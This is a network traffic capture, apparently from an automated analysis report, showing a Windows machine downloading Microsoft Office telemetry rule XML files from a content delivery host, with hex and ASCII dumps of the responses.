2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	51257	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:01 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:01 UTC	584	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:01 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182001Z-16849878b78zqkvcwgr6h55x9n00000009dg000000004rp3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-10-31 18:20:01 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	51258	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:01 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:01 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182001Z-16849878b787bfsh7zgp804my400000008pg00000000ge8z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:01 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	51259	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:01 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:01 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 54e1ad71-801e-008f-48b2-272c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182001Z-17c5cb586f6fqqst87nqkbsx1c000000089g00000000h2py x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:01 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	51256	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:01 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:01 UTC	584	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:01 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182001Z-16849878b7828dsgct3vrzta7000000008a000000000eqe5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-10-31 18:20:01 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	51255	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:01 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:01 UTC	563	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:01 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 041e76a7-601e-005c-45ae-26f06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182001Z-16849878b786lft2mu9uftf3y40000000b3000000000qdf8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:01 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	51262	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:02 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:02 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182002Z-16849878b78bjkl8dpep89pbgg00000008qg000000000c84 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:02 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	51263	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:02 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:02 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182002Z-16849878b78fkwcjkpn19c5dsn00000008zg0000000048q4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:02 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	51260	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:02 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:02 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182002Z-16849878b78fssff8btnns3b140000000a8g00000000276h x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
